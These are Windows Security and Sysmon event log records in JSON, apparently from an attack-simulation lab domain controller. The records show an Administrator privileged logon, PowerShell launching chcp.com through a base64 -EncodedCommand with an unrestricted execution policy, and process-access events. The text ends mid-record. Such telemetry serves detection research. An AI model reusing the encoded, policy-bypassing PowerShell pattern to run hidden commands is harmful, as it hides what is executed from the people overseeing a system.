{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220653,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA6DFE\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xa6dfe","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5420,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.338\r\nProcessGuid: {A837DB8D-032E-5F25-0000-00100E6E0A00}\r\nProcessId: 4916\r\nImage: C:\\Windows\\System32\\chcp.com\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Change CodePage Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CHCP.COM\r\nCommandLine: \"C:\\Windows\\system32\\chcp.com\" 65001\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032E-5F25-0000-0020CE520A00}\r\nLogonId: 0xA52CE\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD\r\nParentProcessGuid: {A837DB8D-032E-5F25-0000-00105B620A00}\r\nParentProcessId: 796\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.338","ProcessGuid":"{A837DB8D-032E-5F25-0000-00100E6E0A00}","Image":"C:\\Windows\\System32\\chcp.com","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Change CodePage Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"CHCP.COM","CommandLine":"\"C:\\Windows\\system32\\chcp.com\" 65001","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032E-5F25-0000-0020CE520A00}","LogonId":"0xa52ce","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD","ParentProcessGuid":"{A837DB8D-032E-5F25-0000-00105B620A00}","ParentProcessId":"796","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5421,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.328\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-00105B620A00}\r\nSourceProcessId: 796\r\nSourceThreadId: 3932\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-00100E6E0A00}\r\nTargetProcessId: 4916\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98582f1d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a23ff7(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a23cc8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+984d50dd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+979e485e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a42d2d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a26392(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a26392(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a26223(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a181a8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a246db(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a242ce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a23ff7(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a23cc8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+984d50dd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a0ab29(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a0a0f9(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.328","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-00105B620A00}","SourceProcessId":"796","SourceThreadId":"3932","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-00100E6E0A00}","TargetProcessId":"4916","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98582f1d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a23ff7(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a23cc8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+984d50dd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+979e485e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a42d2d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a26392(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a26392(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a26223(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a181a8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a246db(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a242ce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a23ff7(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a23cc8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+984d50dd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a0ab29(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a0a0f9(wow64)","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5422,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.328\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-00100E6E0A00}\r\nTargetProcessId: 4916\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.328","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-00100E6E0A00}","TargetProcessId":"4916","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5423,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5424,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5425,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 